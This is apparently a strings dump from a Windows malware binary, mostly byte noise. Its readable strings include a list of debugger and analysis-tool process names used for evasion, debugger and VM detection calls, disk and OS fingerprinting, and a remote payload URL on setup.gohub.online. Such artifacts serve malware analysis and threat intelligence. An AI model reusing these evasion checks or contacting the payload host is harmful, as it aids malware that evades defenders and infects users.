ntdll.dll
MSVCRT.dll
KERNEL32.dll
WS2_32.dll
iphlpapi.dll
P,fH.
nr<
,8.
fX?
XG'u
(aN
|K5;X
UQw
SV3
_^[]
V9]
~8F
C;]
1_^[]
tDS
W9F
JSj
QPW
_^[
FVW
Yu%
^_[]
Yu1
VWj
QQSVW
uNS
u<O
_^[
_^[]
SVW
~;;^
C;^
_^[
SVW
Kx2j X+E
_^3
|(;
SVW
|N;
_^[
Yul
191
191
^[]
}SW
YuD
Yu+
Y_[^
~IS
7_^[]
7_^[]
SVW
YuHP
Yu6G
_^[
SVWj
_^[
PSV3
};9]
@@P
Yj 
}3+
Y;E
RPV
Y}P
_^[
u:PV
SV}
SVV
_^[
@PS
WSS
F;u
@PS
WPS
OYu
^St
X_[
X^+
_^[
WjXj
_^]
Yur
~(P
SVW
_^[]
WtO
p@Q
4QPV
#Eg
vT2
Sj@
t*;
r&S
@YKYu
_^]
p $
:b%
QZ^&
7"a
D")
Y[e
QQV
Wj8
jxX+
PSSj
_^[
WPh
h@J
WPh4J
Ph(J
h J
WWWW
Ph&-
t&h
X_^[
4VW
wPj@h
h|J
hpJ
_^[
Wto
YtB
w#j
V@h
Vh&-
QQSUV
ou(Vj
_^][YY
Ph K
SSj
QSSh
SSS
SPS
SPf
h<K
j@P
SSj
PSSh
AANu
_^[
j Ph
Sj.j
_^[
0@Ou
SVW
h<K
j@P
VVj
PVVh
j!Ph
AANu
_^[
h<K
j@P
SSj
WSV
SPj
WSV
SPWVSSh
a|d
A%W
A%W
|!;}
@;E
[^]
PhpK
j@P
SSj
hdK
j<Ph
t78
AANu
VW3
FGG
hpJ
W;V
YY_^
Yta
_^[]
SVW3
_^[
SVW3
f9]
jLW
WSP
F8@P
F<f
F<@@P
SSSj
Sh)C
tf3
v4f
t5j
VPSS
_^[
VWS
<+t
<.t
<-u
?:u
Sj;W
u$Sj?W
Sj#W
WSQ
Wj/
Wj@
8:u
WRQ
~ 9]
t.9]
8:u
@;E
WRQ
t#CS
wK9V8t
9V4u
t,;
t"WSQ
F,;
9V0v
V0j
X_^[
YtN=
N,9N0u"
YY^
^@_
^@_
F@u
F0S
N0;
v$PW
F(S
F$j
RQP
v<W
~@W
F<j
^@_
F(PSW
N,;
F(Q
F,;
_^[
filemon.exe
procexp.exe
iris.exe
EHSniffer.exe
windbg.exe
ImmunityDebugger.exe
idag.exe
ollydbg.exe
procmon.exe
vmacthlp.exe
wireshark.exe
devenv.exe
INSTALL_SOURCE
&sid=%u
INSTALL_SID
INSTALL_CID
sltp://setup.gohub.online:1108/setup.bin?id=128
ntdll.dll
ZwQueryInformationProcess
\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}
VolumeNumber
X:\
\\.\X:
%SystemDrive%
\\.\PhysicalDrive%d
SCSIDISK
\\.\Scsi%d:
os=%d&ar=%d
kernel32.dll
IsWow64Process
RtlGetNtVersionNumbers
%02x
&sz=
sltp
